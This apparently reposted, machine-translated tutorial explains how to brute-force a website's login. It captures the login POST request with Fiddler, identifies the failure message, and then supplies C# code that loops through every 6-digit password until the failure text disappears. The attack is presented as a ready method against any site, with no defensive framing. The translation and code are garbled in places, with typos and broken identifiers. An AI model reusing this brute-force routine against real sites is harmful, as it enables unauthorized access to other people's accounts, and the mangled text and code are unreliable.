Web crawler (password cracking)

Source: Internet
Author: User

The technology used is also the network grab packet, DOM tree analysis, network request and so on.

    1. Network Grab Bag
    2. DOM Tree Analysis
    3. Network requests
    4. Circular cracking
Network Grab Bag

Here to grab the bag is very simple, first open the Fiddler software, and then open the website you want to crack, enter the user name and a fake password (if you know the real password, there is no need to crack), click Login, this time will be seen from the Fiddler a login request, is generally a POST request, You can clearly see the requested URL, user name, password, etc. from the request content, copy the statement and prepare for the next step.

DOM Tree Analysis

Here the DOM tree analysis, only need to analyze the results of just that login request, it is generally prompt you login failure, but some return is the entire HTML page, some JSON statements and so on, but after all, you will find a sign that you failed to log in the place, this also recorded, ready to work on the next step.

Network requests

This network request in the previous article also has introduced, here I again release code, but need to emphasize is using (StreamReader sr = new StreamReader(instream, encoding)) in the encoding, if you can see the return page encoding, here to the corresponding code, otherwise at noon will appear garbled situation, if not know, Then you can use GB2312 and so on each test, until there is no garbled.

public string getcontent ( String method, string URL, string postdata = null)      {
    HttpWebResponse response = null;    HttpWebRequest request = null;    if (cookie = = null) cookie = new Cookiecontainer ();        Prepare request ... try {//Set parameter request = WebRequest.Create (URL) as HttpWebRequest; Request.        Cookiecontainer = cookie; Request.        AllowAutoRedirect = true; Request. Method = method.        ToUpper (); Request.        ContentType = "application/x-www-form-urlencoded"; String useragent = String. Format ("mozilla/4.0 (compatible; MSIE 6.0;        MS Web Services Client Protocol 2.0.50727.8670) "); Request.        useragent = useragent; Request.        ContentLength = Postdata.length; if (method. ToUpper () = = "POST") {if (!string.                IsNullOrEmpty (PostData)) {byte[] data = Encoding.Default.GetBytes (postdata); Request. ContentLength = data.                Length; using (Stream OutStream = Request. GetRequestStream ()) {OutStream. Write (data, 0, data. LeNgth); }}}//Send request and get corresponding response data response = requests.        GetResponse () as HttpWebResponse; Until request. The GetResponse () program only starts sending post requests to the target page using the Stream instream = response.                GetResponseStream ()) {using (StreamReader sr = new StreamReader (instream, encoding)) { Returns the result page (HTML) code string content = Sr.                ReadToEnd ();            return content; }}} catch (Exception ex) {string err = ex.        Message;    return err; The finally {if (response! = NULL) response.    Close (); }}

  

 
Circular cracking

Here is the core of this article, know the login request method and login failure prompt, Next is through the same as we cracked password box password one by one to try, here is only the program automatically completed, first write a loop from 0 to 999999 (assuming 6-digit password), Then stitching the data in the login request (including the user name, password), and then send the network request to determine the results of the request, if it contains the previously found failure identity, continue to loop, if not included, congratulations your password found. The code is as follows:

int start = 0;int end = 999999;for (int i = start; I <= end; i++) {    var pass = i.tostring (). PadLeft (6, ' 0 ');//less than 6 bits, left complement 0    var post = "Usename=yourname" + "&password=" + pass;//stitching requested data    var res = Getconten T ("Post", loginurl, post);    if (!res. Contain ("Fail ID"))    {        MessageBox.Show ("Password is:" + Pass);        return;}    }

  

i.ToString().PadLeft(6, ‘0‘)the function is less than 6 bit 0, let the password meet 6 bits. var post = "usename=yourname" + "&password=" + passthe function is to splice the data sent.

Web crawler (password cracking)

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.